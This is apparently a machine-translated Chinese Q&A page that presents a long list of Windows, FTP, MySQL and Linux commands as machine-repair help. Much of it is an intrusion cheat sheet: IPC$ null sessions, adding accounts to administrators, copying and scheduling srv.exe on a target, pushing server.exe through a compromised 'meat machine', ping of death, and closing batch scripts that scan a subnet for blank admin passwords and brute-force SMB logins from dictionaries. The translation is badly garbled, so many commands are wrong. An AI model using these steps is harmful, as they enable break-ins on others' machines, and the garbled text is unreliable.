\\ip\ipc$ \"\"/user:\" \"to establish ipc null link.Net use $ \">\\ip\ipc$ \"password\" /user:\" username \"to establish ipc non-empty link.Ne" />
Current location - Quotes Website - Signature design - Can you help me list the running commands, plus the commands that may be used when repairing the machine?
Can you help me list the running commands, plus the commands that may be used when repairing the machine?
Enter CMD in Run to bring up DOS.

Net use $ ">\\ip\ipc$ ""/user:" "to establish ipc null link.

Net use $ ">\\ip\ipc$ "password" /user:" username "to establish ipc non-empty link.

Net uses h: $ "> \\ip\c$ "password"/user: "user name" login directly, mapping the other party C: local, which is H:

Net uses h: $ "> \\ip\c$ Map each other after login. C:

Use $ ">\\ip\ipc$ /del to delete the ipc link.

Net uses h: /del to delete the mapping from the other side to the local area, and the name is h:

Net user name password/add create user.

Network User Guest/Activity: Yes, the guest user is activated.

Net users to see which users are there.

Net user account name to view the properties of the account.

Net localgroup administrators user name /add adds "user" to the administrator, giving him administrator rights. Note: add the plural s after the administrator.

Net to see which services are turned on.

The net start service name starts the service; (e.g. network startup remote login, network startup schedule)

Network Stop Service Name Stop Service.

Net time \\ The target ip checks the other party's time.

Net time \\ Target ip /set sets the time of the local computer to be synchronized with the time of the "target ip" host, and adds the parameter /yes to cancel the confirmation information.

Check which * * * privileges are enabled in the local LAN.

Net view \\ip to see which * * * permissions are enabled in the other party's LAN.

Network Configuration Displays the system network settings.

Network offline disconnect * * * Enjoy

Net pause service name pause service.

Net send ip "SMS" sends a message to the other party.

The network connection type and information are used for the network.

Share online to see the local enjoyment.

Net share ipc$ Open ipc$*** Enjoy.

Net share ipc$ /del Delete ipc$***

Net share c$ /del Delete c:* * * * Enjoy.

Net user guest 12345 logs in and changes the password to 12345.

Net password password changes the system login password.

Netstat -a to see which ports are open. Netstat -an is often used.

Netstat -n checks the network connection of the port, usually netstat -an.

View the work in progress

Example of netstat -p protocol name: netstat -p tcq/ip view the usage of the protocol (view the usage of tcp/ip protocol).

Netstat -s checks the usage of all the protocols in use.

One of the ip ports of Nbtstat -A ip from 136 to 139 is open. You can view the user name that the other party recently logged in (user name before 03)-Note: the parameter -A should be capitalized.

Tracert- parameter ip (or computer name) tracks the route (packet), and parameter: "-w number" is used to set the timeout interval.

Ping ip (or domain name) sends data with a default size of 32 bytes to another host. The parameter is "-l[ space] packet size"; "-n times to send data"; "-t" means ping all the time.

Ping -t -l 65550 ip Ping of death (sending files larger than 64K and ping all the time becomes ping of death).

Ipconfig (winipcfg) is used for windows NT and XP(windows 95 98) to view the local ip address. Ipconfig can display all configuration information with the parameter "/all".

Tlist -t displays processes in a tree-row list (it is an additional tool of the system, which is not installed by default and is located in the Support/tools folder of the installation directory).

Add the -F parameter to the kill -F process name to force a process to end (it is an additional tool of the system and is not installed by default, under the Support/tools folder of the installation directory).

Del -F file name can be deleted after adding the-f parameter. /AR, /AH, /AS and /AA respectively mean deleting read-only, hidden, system and archive files. /A-R, /A-H, /A-S and /A-A mean to delete files other than read-only, hidden, system and archive files. For example, "DEL/AR *. * "means to delete all read-only files in the current directory," DEL/A-S *. * "means to delete all files except system files in the current directory.

Delete the /S /Q directory or use: rmdir /s /Q directory /S to delete the directory and all subdirectories and files under it. At the same time, use the parameter /Q to cancel the deletion operation, and delete it directly after system confirmation. (Both commands have the same effect)

Move the drive letter \ Path \ Path to store the file name to be moved \ After the file name is moved, use the parameter /y to cancel the prompt, confirm that the same file exists in the moving directory, and overwrite it directly.

fc one . txt two . txt & gt; 3t.txt compares two files and outputs the differences to 3t.txt file. > and > > This is a redirection command.

The at id number opens the registered scheduled task.

At /delete stops all scheduled tasks. Use the parameter /yes to stop directly without confirmation.

Stop the registered scheduled task on id number/deletion.

View all scheduled tasks.

At \\ip time program name (or command) /r Run the other party's program and restart the computer at a certain time.

Finger username @host to see which users have logged in recently.

Telnet ip port is far away from the login server, and the default port is 23.

Open ip connects to IP (command after IP(telnet login)

Telnet: Typing telnet directly on this machine will input Telnet on this machine.

Copy path \ file name 1 path \ file name 2 /y Copy the file 1 to the specified directory as file 2, and use the parameter /y to cancel confirmation, while overwriting the existing directory file.

Copy c: \ srv.exe $ "> \\ip\admin$ Copy the local c:\srv.exe to the other party's admin.

Cppy 1st. jpg/b+2st. txt/a 3st.jpg hides the contents of 2st.txt in1st.jpg and generates a new file in 3st.jpg. Note: The header of 2st.txt file should be blank for three lines. Parameters: /b refers to binary file, and /a refers to ASCLL file.

Copy $ \ svv.exe "> \ \ IP \ admin $ \ svv.exe c: \ or: copy \ \ IP \ admin $ \ *. * copy the srv.exe files (all files) enjoyed by other admini$*** to the local c:

Xcopy file or directory tree destination address \ directory name Copy file and directory tree, overwriting the same file without parameter /y prompt.

Tftp -i own IP (using meat machine IP when using meat machine as a springboard) After logging in to server.exe C:\ server.exe, download the server.exe of "IP" to the target host c: \ server. Exe parameter: -i means to transmit in binary mode, such as when transmitting an EXE file, or to transmit in ASCII mode (transmission text file mode) without-i.

TFTP Tftp -i IP put c:\server.exe login and upload the local c:\server.exe to the host.

The ftp ip port is used to upload files to the server or perform file operations. The default port is 2 1. Bin refers to binary transmission (executable file entry); By default, it is transmitted in ASCII format (if it is a text file).

Routing print shows IP routing, mainly showing network address, subnet mask, network mask, gateway address, gateway address and interface address.

Arp checks and processes the ARP cache. ARP stands for name resolution, which is responsible for resolving IP addresses into physical MAC addresses. Arp -a will display all the information.

Start the program name or command /max or /min to open a new window and maximize (minimize) the running of a program or command.

Memory for checking cpu usage.

Attrib file name (directory name) View the properties of the file (directory).

Attrib file name -A -R -S -H or +A +R +S +H deletes (adds) the archive, read-only, system and hidden attributes of the file; With+ is added as an attribute.

View the directory of the file. Parameters: /Q shows which user files and directories belong to, /T:C shows when files were created, /T:A shows when files were last accessed, and /T:W shows when files were last modified.

Date /t, Time /tUsing this parameter, namely "Date /T" and "Time/t", only the current date and time will be displayed without entering a new date and time.

Set specifies the environment variable name = the character to be assigned to the variable sets the environment variable.

Set displays all current environment variables.

Set p (or other characters) displays all environment variables that currently start with the character p (or other characters).

Pause Pause the batch program and display: Please press any key to continue. ....

If performs conditional processing in a batch program (see if commands and variables for more details)

The goto tag points the cmd.exe to the tag line in the batch program (the tag must be a separate line and start with a colon, such as the ":start" tag).

Call Path \ Batch File Name Calls another batch program from a batch program (see call/? )

For executes a specific command for each file in a set of files (see for commands and variables for more details).

Echo on or off Turn echo on or off to display the current echo setting, only echo, no parameters.

Echo information displays information on the screen.

Echo information > > pass.txt saves the information in the pass.txt file.

Findstr "Hello" aa.txt looks for the string Hello in the aa.txt file.

Find file name Find file

Title Title Name Changes the title name of the CMD window.

The color value sets the foreground color and background color of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7= white, 8= gray, 9= light blue, a = light green, B= light green, C= light red and D= light purple.

The prompt name changed the command prompt displayed in cmd.exe (uniformly changed C:\, D:\ to: EntSky\).

Print file name Print text file

Ver displays version information in DOS window.

Winver pop-up window displays version information (memory size, system version, patch version, computer name).

Format letter /FS: type format disk, type: FAT, FAT32, NTFS, for example: Format D: /FS:NTFS.

Md Directory Name Create Directory

Replace the source file the directory of the replaced file replaces the file.

Rename the original file name, new file name and file name.

Tree displays the directory in a tree structure, and the file names in the first folder will be listed with the parameter-f.

The type file name displays the contents of the text file.

More file names display the output file screen by screen.

Doskey command lock = character

Doskey command to unlock = lock command provided for DOS (edit command line, call win2k command, create macro). For example: lock dir command: doskey dir=entsky (doskeydir = dir cannot be used); Unlock: doskey dir=

Taskmgr calls task manager

Chkdsk /F D: check disk d and display status report; Add the parameter /f and fix the error on the disk.

Tlntadmn telnt service admn, type tlntadmn, select 3, and then select 8 to change the default port 23 of the telnet service to any other port.

Exit Exit cmd.exe program or exit the current batch script instead of cmd.exe by using the parameter /B at present.

Path Path \ File name of executable file Sets the path of executable file.

Cmd starts the win2K command interpretation window. Parameters: /eff, /en Close and open command extensions. See cmd/?

The regedit /s registry file name is imported into the registry; Parameter /S refers to the quiet mode import without any hint;

Regedit /e registry file name export registry

Cacls file name parameter displays or modifies the file access control list (ACL)- for NTFS format. Parameter: /D User name: set to deny user access; /P User name: perm replaces the access right of the specified user; /G User name: perm gives the specified user access rights; Perm can be: n none, r reading, w writing, c changing (writing), f full control; Example: cacls D:\test.txt /D pub sets D:\test.txt to deny access to pub users.

Cacls file name View the list of access user permissions for the file.

REM text content adds comments to the batch file

View or change the local network configuration

IIS service command:

Iisreset /reboot restarts win2k computer (but there is a prompt for system restart).

Iisreset /start or stop starts (stops) all Internet services.

Iisreset /restart stops and restarts all Internet services.

Iisreset /status shows the status of all Internet services.

Iisreset /enable or disable enables (disables) restarting Internet services on the local system.

Iisreset /rebootonerror When an Internet service is started, stopped or restarted, it will be restarted if an error occurs.

If the Internet service cannot be stopped, Iisreset /noforce will not forcibly stop the Internet service.

Iisreset /timeout Val did not stop the Internet service when the timeout (seconds) expired. If the /rebooterror parameter is specified, the computer will restart. The default values are restart for 20 seconds, stop for 60 seconds and restart for 0 seconds.

FTP command: (details will be given later)

The command line format of ftp is:

FTP-V-D-I-N-G[ host name ]-V displays all the response information of the remote server.

-d Use debug mode.

-n Restrict ftp automatic login, that is, do not use it. Netrc file.

-g Cancels the global file name.

Help [command] or? [Command] View command description

Bye or quit terminates the host FTP process and exits FTP management mode.

Pwd lists the current remote host directory.

Upload or send local file name [file name uploaded to host] Send local file to remote host.

Get or recv[ file name of remote host] [file name after downloading to local] is transmitted from remote host to local host.

Mget [remote-files] receives a batch of files from a remote host to a local host.

Mput local-files transfers a batch of files from a local host to a remote host.

Dir or ls[ Remote Directory] [Local File] lists the files in the current remote host directory. If there is a local file, write the result to the local file.

AsciSets the file to be sent in Ascii format (default).

Bin or image settings files are sent in binary mode.

Bell will give an alarm every time the file transfer is completed.

Cdup returns to the previous directory.

Close interrupts the ftp session with the remote server (corresponding to open)

Open host[port] establishes a connection to the specified ftp server and can specify the connection port.

Delete delete a file from a remote host.

Delete a batch of files.

Mkdir directory-name creates a directory on the remote host.

Rename [From] [To] Change the file name in the remote host.

Rmdir directory-name deletes the directory in the remote host.

Status Displays the current FTP status.

The system displays the remote host system type.

User User Name [Password] [Account] Log in to the remote host again with a different user name.

Open host [port] reestablishes a new connection.

Prompt interactive prompt mode

Macdef defines macro commands

The lcd changes the working directory of the current local host. If it defaults, it will go to the home directory of the current user.

Chmod changes the file permissions of the remote host.

When case is turned on, the file name copied by the MGET command is transferred to the local machine, and all files are converted to lowercase letters.

Cd remote-dir enters the remote host directory.

Cdup enters the parent directory of the remote host directory.

! Execute the interactive shell on the local machine, and exit returns to the ftp environment, such as! ls*。 vitality

MYSQL command:

Mysql -h host address -u user name -p password to connect MySQL; If MYSQL has just been installed, superuser root has no password.

(For example: MySQL-h110.10.110-urot-p123456)

Note: u and root can be left blank, and others can be left blank)

Exit exit MYSQL

Mysqladmin -u username -p old password new password change password

Grant select permission to the database. * To the login host identified by the user name @ password; Add a new user. (Note: unlike the above, the following are all commands in MYSQL environment, so a semicolon is used as the command terminator. )

Display database; Displays a list of databases. At first, there were only two databases: mysql and test. Mysql library is very important. It contains MYSQL system information. When we modify passwords and add new users, we actually use this library to operate.

Using mysql

Display table; Display data tables in the library

Describe the table name; Display the structure of the data table

Create a database library name; Build a library

Use the library name;

Create a table name (field setting list); Make a watch

Delete the database library name;

Delete the table name; Deleting databases and deleting tables

Delete from the table name; Clear the records in the table

Select * from table name; Display records in a table

mysqldump-opt school & gt; School.bbb backup database: (the command is executed in the \\mysql\\bin directory of DOS); Note: Back up the database school to the file school.bbb, which is a text file with an arbitrary file name. Open it and see if there's anything new.

New commands under win2003 system (practical part);

The shut down/ parameter shuts down or restarts the local or remote host.

Description of parameters: /S Turn off the host, /R Restart the host, /T Set the delay time in the range of 0 ~ 180 seconds, /A Cancel the startup,/m//the remote host specified by IP.

Example: shutdown /r /t 0 restarts the local host immediately (without delay)

Task ill/ parameter process name or pid of process terminates one or more tasks and processes.

Parameter Description: /pid To terminate the pid of a process, you can use the tasklist command to obtain the pid of each process, /IM the process name of the process to be terminated, /F forcibly terminate the process, /T terminate the specified process and its started subprocesses.

Tasklist displays the process identifiers (PID) of processes, services and service processes currently running on local and remote hosts.

Parameter Description: /M lists the dll files loaded by the current process, /SVC displays the services corresponding to each process, and if there are no parameters, only the current process is listed.

Basic commands under Linux system: case-sensitive.

Uname displays version information (same as ver of win2K)

Dir shows the current directory file, and ls -al shows the hidden file (the same as the dir of win2K).

Pwd queries the current directory location.

Cd cd .. Go back to the previous directory, notice that there is a space between cd and ... CD/ Go back to the root directory.

Cat File Name View File Contents

Cat & gtAbc.txt writes the contents to the file abc.txt

More file names display text files page by page.

Cp copy file

Mv mobile file

Rm file name deletes files, RM- directory name deletes directories and subdirectories.

Mkdir Directory Name Create Directory

Rmdir deletes the subdirectory, and there are no documents in the directory.

Chmod sets access rights for files or directories.

Grep looks for strings in files.

Difference file comparison

Find file search

Date Current date and time.

Who is inquiring about the person who is currently using the same machine as you and the time and place of login?

W Query the details of the current computer user.

Whoami check your account name.

Group View someone's group.

Passwd change password

History, check your own orders.

Ps shows the process status.

Kill stops a process.

Gcc hackers usually use it to compile files written in C language.

Su permissions are converted to the specified user.

Telnet IP telnet connects to another host (same as win2K). When bash$ appears, the connection is successful.

Ftp ftp connects to the server (same as win2K).

Attachments: Batch Commands and Variables

1:Basic format of for command and variable:

For/parameter% variable in (set) docommand [command _ parameters]% variable: Specify a single-letter replaceable parameter, such as: %i, use: %%i to specify the variable, use: %i% to call the variable, and the variable is case-sensitive (%i is not equal to %i).

Variables that can be processed by batch processing in the time range of %0-%9 * * * 10, where %0 is used by default for the batch file name and% 1 is the first value entered when using this batch. Similarly,% 2-%9 refers to the second to ninth values entered; Example: net usage of $ ">\ \ ip \ ipC $ pass/user: the IP in the user is% 1, the pass is% 2, and the user is %3.

(set): Specify a file or a group of files, using wildcards, such as (D:\user.txt) and (11254) (1-kloc-0/254), {"(1)

Command: Specify the command to be executed on the first file, such as: net use command. If multiple commands are to be executed, command this room to add:&; separate

Command_parameters: Specify parameters or command line switches for a specific command.

IN (set): refers to the value in (set); DO command: refers to executing the command.

Parameter: /L means incremental form {(set) is incremental form}; /F refers to continuously fetching values from a file until it is finished {(set) is a file, such as (d:\pass.txt)}.

Usage example:

@ Turn off echo

Echo uses the format: test.bat *. *. * > test. txt

for/L % % G in( 1 1 254)do echo % 1。 %% g>> test.txt & Network usage \ \% 1. %% g/user: administrator | find "command completed successfully" >> test.txt.

Save as test.bat Description: Try to establish IPC$ connection with blank administrator password for 254 IPS of specified class C network segment in turn. If successful, save the IP in test.txt.

/L refers to the incremental form (that is, from 1-254 or 254-1); Enter the first three digits of IP: *. *. * is the default%1for batch processing; %%G is a variable (the last bit of ip); & is used to separate the echo and net use commands; | refers to the establishment of ipc$, and use find in the results to check whether there is information of "command successfully completed"; % 1.%%G is a complete IP address; (1 1 254) refers to the starting value, increasing amount and ending value.

@ Turn off echo

Echo usage format: ok.batip.

Smb.exe%1%%I d: \ pass.dic200 for/f%% I in (d: \ user.dic200).

Save as: ok.exe Description: After inputting an IP, use the dictionary file d:\pass.dic to decrypt the user password in d:\user.dic until all the values in the file are retrieved. %%i is the user name; % 1 is the IP address entered (default).